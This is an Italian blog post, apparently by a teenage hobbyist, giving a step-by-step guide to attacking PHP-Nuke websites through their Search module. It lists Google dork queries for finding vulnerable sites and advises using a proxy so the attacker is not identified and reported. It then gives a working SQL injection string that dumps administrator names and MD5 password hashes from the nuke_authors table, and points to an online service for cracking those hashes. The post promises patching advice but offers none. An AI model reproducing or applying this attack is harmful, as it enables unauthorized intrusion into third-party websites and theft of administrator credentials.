Creato da Ale_XXL il 28/10/2008
hacking,cracking,virus ecc... Ciao a tutti! Io mi chiamao Alessandro ho 14 e sn appassioanbto di computer,infatti faccio informtica alle superiori,come potet vdere dal blog sn un hacker in crescita,anche se accnedo il pc qnd mi rmpo o mi nnoio,perche di solito sono con gli amici o gioco a calcio.Divertitevi col sito,se serv qualcosa fatemelo sapere.
 

Area personale

 

Tag

 

FACEBOOK

 
 

Giochi online

Get the Giochi online di Jiggy.it widget and many other great free widgets at Widgetbox!
 
Get the Real Stat - Dynamic Online User Counter widget and many other great free widgets at Widgetbox!
 
Get the Visitor Map Widget widget and many other great free widgets at Widgetbox!
 
Get the Easy FLV And YouTube Embed widget and many other great free widgets at Widgetbox!
 

 

Archivio messaggi

 
 << Luglio 2024 >> 
 
LuMaMeGiVeSaDo
 
1 2 3 4 5 6 7
8 9 10 11 12 13 14
15 16 17 18 19 20 21
22 23 24 25 26 27 28
29 30 31        
 
 
 

 

« Entare in un pc altruiEludere gli anit virus »

crack php nuke

Post n°10 pubblicato il 30 Maggio 2009 da Ale_XXL
 

In questa guida vi spiegherò come si attua l'SQL Injection sul modulo Search di
un PHPNUKE e come patchare i vulnerabili!!!
Per prima cosa dobbiamo trovare il PHPNUKE vulnerabile a questo tipo di SQL Injection, quindi andiamo su google e scriviamo una delle seguenti frasi:
"Powered by PhpNuke"
"allinurl:phpnuke/modules.php?name=Search"
"allinurl:html/modules.php?name=Search"
"inurl:modules.php?name=Search"
Una volta trovato il sito vulnerabile, apriremo il modulo Search, per vedere se è attivo...
Per aprire il modulo Search, in mancanza del link, basta aggiungere "modules.php?name=Search"
al phpnuke installato, ad esempio "www.sito.com/phpnuke/modules.php?name=Search" (senza apici).
Una volta aperto il modulo Search,OVVIAMENTE PROXATI(senò scoprono il vostro IP e vi possono denunciare), inseriamo la seguente stringa
p0hh0nsee%') UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/*
una volta inserita, clicchiamo INVIO, e vediamo il risultato...
Se il sito è vulnerabile al bug, visualizzeremo risultati del tipo
d708cf4edf867f03e5fc2f510912fab1
Contributo di "nome dell admin"
Postato da 2 il Giovedì, 01 gennaio 2006 ore 12:40
Argomento: (9 Commenti)

dove "d708cf4edf867f03e5fc2f510912fab1" sarà la password criptata in formato MD5, e
"nome dell admin" sarà il nick dell'amministratore...

Ora il problema sarà... Come crackare la password in formato MD5?

Facile.. basta andare su http://cracker.b4ck.net/ inserite il codice del bug e vi dirà la password dell admin

La URL per il Trackback di questo messaggio è:
https://blog.libero.it/Hacking3Cracking/trackback.php?msg=7150348

I blog che hanno inviato un Trackback a questo messaggio:
Nessun trackback

 
Commenti al Post:
Nessun commento
 
 

© Italiaonline S.p.A. 2024Direzione e coordinamento di Libero Acquisition S.á r.l.P. IVA 03970540963